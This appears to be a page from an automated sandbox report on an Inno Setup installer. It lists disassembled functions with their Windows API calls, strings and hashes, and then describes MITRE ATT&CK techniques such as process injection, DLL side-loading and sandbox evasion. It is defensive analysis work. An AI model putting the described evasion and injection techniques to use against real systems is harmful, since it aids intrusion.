Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: 3857fa41202c00393bf52a25eac300062cd4c6cabaccb8b1d91afe36a5cbebae
Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
Opcode Fuzzy Hash: 3857fa41202c00393bf52a25eac300062cd4c6cabaccb8b1d91afe36a5cbebae
Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E

Function 0042EBAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C

Strings

SHAutoComplete, xrefs: 0042EC16
shlwapi.dll, xrefs: 0042EBE7

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressDirectoryErrorLibraryLoadModeProcSystem
String ID: SHAutoComplete$shlwapi.dll
API String ID: 2552568031-1506664499
Opcode ID: 7995cfecf2d618c975dd8981ab904d73d34149fcb869a5e0839001f91a99d217
Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
Opcode Fuzzy Hash: 7995cfecf2d618c975dd8981ab904d73d34149fcb869a5e0839001f91a99d217
Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D

Function 0041EEB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041EF03
73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

Strings

R{E, xrefs: 0041EF46

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A25940CurrentThread
String ID: R{E
API String ID: 2655091166-1510225646
Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18

Function 00495ED2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00454B10: GetCurrentProcess.KERNEL32(00000028), ref: 00454B1F
Part of subcall function 00454B10: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B25

SetForegroundWindow.USER32(0001041A), ref: 00495F04

Strings

Restarting Windows., xrefs: 00495EE1
Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00495F2F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
API String ID: 3179053593-4147564754
Opcode ID: 99583e24e2e9f0d058b79390f435a056594d33341ba4437182f0d97c2d65ddcd
Instruction ID: 2fddce828c46425de23b35f9f90fc861464a2ee23dcfefb5497e4e6653f4e5f3
Opcode Fuzzy Hash: 99583e24e2e9f0d058b79390f435a056594d33341ba4437182f0d97c2d65ddcd
Instruction Fuzzy Hash: 6D01D470614240ABEB12EBA5E902B5C7FE89B4431DF90407BF800AB6D3CA3C9949871D

Function 0047B2A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B52A,00000000,0047B540,?,?,?,?,00000000), ref: 0047B306

Strings

RegisteredOwner, xrefs: 0047B2E3
RegisteredOrganization, xrefs: 0047B2F5

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: c3bf9b4cfe31b8ac7e6256e7f5117190935263c8829e542cfeb5ed9836d967b2
Instruction ID: 04360fd0e76bd9885b09d18b1896d3c06c7e8dc90750632679e29014fc616a1a
Opcode Fuzzy Hash: c3bf9b4cfe31b8ac7e6256e7f5117190935263c8829e542cfeb5ed9836d967b2
Instruction Fuzzy Hash: 18F0BB707041489BDB04D665BD9679F335DD742304F60807BE9059F352DBB89E41C79C

Function 0046DFBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,;QG,?,0049B178,?,0046E2D3,?,00000000,0046E840,?,_is1), ref: 0046DFDF

Strings

;QG, xrefs: 0046DFC1
Inno Setup: Setup Version, xrefs: 0046DFDD

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Value
String ID: ;QG$Inno Setup: Setup Version
API String ID: 3702945584-3817970878
Opcode ID: 76b32ddd4d10346908dc358c37a69706ac228e0d5ddc923cc77c0b69b20b52cf
Instruction ID: f3050d33c5814ab6aa431b6cc648485a2c40fd7aee5bec7ab5b075e1bccb7de3
Opcode Fuzzy Hash: 76b32ddd4d10346908dc358c37a69706ac228e0d5ddc923cc77c0b69b20b52cf
Instruction Fuzzy Hash: 62E06D717016043FD710AA6B9C85F5BBADCDF98365F10403AB908DB392DA78DD0081A8

Function 004966CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0047BD14: FreeLibrary.KERNEL32(?,004801C6), ref: 0047BD2A

Part of subcall function 0047B9E8: GetTickCount.KERNEL32 ref: 0047BA30

Part of subcall function 0045658C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004565AB

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497023), ref: 00496721
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497023), ref: 00496727

Strings

Detected restart. Removing temporary directory., xrefs: 004966DB

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: 3a3b7b64b696b0b5eb4b2fbd0c96e19912eeadef8c9504a627da7b4bf6410b86
Instruction ID: e7033022c8af971c365411b5d921d6e3ccf45ff122b41cddea678748c3bdb50c
Opcode Fuzzy Hash: 3a3b7b64b696b0b5eb4b2fbd0c96e19912eeadef8c9504a627da7b4bf6410b86
Instruction Fuzzy Hash: 51E02B722086442EDA0273F6BC5696B7F4CD74576CB6344BBF90882542D92D4804C97C

Function 00496DB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

ReleaseMutex.KERNEL32(00000000,00496E15,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30,?,?,00000000), ref: 00496DFF
CloseHandle.KERNEL32(00000000,00000000,00496E15,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496E30), ref: 00496E08

Strings

/REG, xrefs: 00496ACD
qI, xrefs: 00496E22
.lst, xrefs: 00496BAC
Setup, xrefs: 00496B07
.msg, xrefs: 00496B92
Inno-Setup-RegSvr-Mutex, xrefs: 00496B25
/REGU, xrefs: 00496AF1
(rI, xrefs: 00496BA9, 00496BB6, 00496DB1, 00496C07

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseDeleteFileHandleMutexRelease
String ID: (rI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$qI
API String ID: 3841931355-2592930226
Opcode ID: 802c359b5d322603e89d04b382a8cb73317160fe2e51a78b201ccde4c7d1085b
Instruction ID: 87198f9731b1192479c04ffe538fefb058e3874758ffd048c95fd336e7cbc4ec
Opcode Fuzzy Hash: 802c359b5d322603e89d04b382a8cb73317160fe2e51a78b201ccde4c7d1085b
Instruction Fuzzy Hash: 14F0A7757086449EDF05ABA5E81296E7BB4EB48714FA3087BF414A29C0C63C5D10CE2C

Function 0047433C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474573), ref: 00474361
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474573), ref: 00474378

Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F

Strings

CreateFile, xrefs: 0047436D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: 5f51b8704c3cef9c239c9d506e5e0bcac8b784699d69f1918d0da9aa1c06ffa5
Instruction ID: f02aa6a343f6253f7681c42d3745bad7d3df1daa7690a22d1e3a4974fa48f9f3
Opcode Fuzzy Hash: 5f51b8704c3cef9c239c9d506e5e0bcac8b784699d69f1918d0da9aa1c06ffa5
Instruction Fuzzy Hash: 4FE06D343803447FEA10EA69CCC6F5A77889B04728F108152BA48AF3E2C6B9FC408618

Function 00421D38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,/sI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464BDA,00000001,00000000,00000000,0046A179), ref: 00421D5B
GetFocus.USER32 ref: 00421D69

Strings

/sI, xrefs: 00421D39

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Focus
String ID: /sI
API String ID: 2734777837-3342994382
Opcode ID: d553a158355a2961e6e2504ff9a6d4932c7003c70a9c95d03eb391321d89c147
Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
Opcode Fuzzy Hash: d553a158355a2961e6e2504ff9a6d4932c7003c70a9c95d03eb391321d89c147
Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C

Function 00456D04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456D11
FileTimeToSystemTime.KERNEL32(00000000,(rI,00000000,0049A628), ref: 00456D28

Strings

(rI, xrefs: 00456D23

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Time$FileSystem
String ID: (rI
API String ID: 2086374402-3675663370
Opcode ID: 38ab8112d76412924180c6dd247b02616f7c2309d52a52d931fcdc0687e5c145
Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
Opcode Fuzzy Hash: 38ab8112d76412924180c6dd247b02616f7c2309d52a52d931fcdc0687e5c145
Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C

Function 0042DD44 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
[!H, xrefs: 0042DD5A, 0042DD5D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Open
String ID: System\CurrentControlSet\Control\Windows$[!H
API String ID: 71445658-1940484145
Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4

Function 004563AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0045633C: CoInitialize.OLE32(00000000), ref: 00456342

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004563D0

Strings

shell32.dll, xrefs: 004563C5
SHCreateItemFromParsingName, xrefs: 004563BB

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressErrorInitializeLibraryLoadModeProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2906209438-2320870614
Opcode ID: c0c5683602bf441784b7df1dc7c137bd755fe9cf32dab37583cc88c87d403b92
Instruction ID: 1abb1b48a8e62328c6f092af9ad77e929cec705f494ad64131ae41d6fe2497e3
Opcode Fuzzy Hash: c0c5683602bf441784b7df1dc7c137bd755fe9cf32dab37583cc88c87d403b92
Instruction Fuzzy Hash: FCC012A0700210968A0033BA040220F18189B4071AB92803FB804EB19BDE7D880A8A6E

Function 0046BF68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BF7D

Strings

SHPathPrepareForWriteA, xrefs: 0046BF68
shell32.dll, xrefs: 0046BF72

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressErrorLibraryLoadModeProc
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2492108670-2683653824
Opcode ID: c3391f0374cd86e5600041abeffc7999f9c8859af53b521e35ed9e47adcbdf30
Instruction ID: a4db22b894df409b76fade00448711417f6f44e3f9dbbe63c1fbbb1ae142da4b
Opcode Fuzzy Hash: c3391f0374cd86e5600041abeffc7999f9c8859af53b521e35ed9e47adcbdf30
Instruction Fuzzy Hash: A9B092A0700680C2CB0877B76C0270B1518D781704B60C07F7080EB6E6EBBC88464FEE

Function 00454BA0 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00454BBF
Sleep.KERNEL32(?), ref: 00454BCF
GetLastError.KERNEL32 ref: 00454BE2
GetLastError.KERNEL32 ref: 00454BEC

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: a775a59a78d83fb6d9ac89cfc08b43a749b3a34362f87e63426a8a809247d61b
Instruction ID: cc91f638363bcbeec99391655354edaee9a736831669a2751ddb7297f70e897e
Opcode Fuzzy Hash: a775a59a78d83fb6d9ac89cfc08b43a749b3a34362f87e63426a8a809247d61b
Instruction Fuzzy Hash: 59F0F072A00518774F24E99E9881B2F629CDAC836E710016BED09DF303D438EC8987A9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
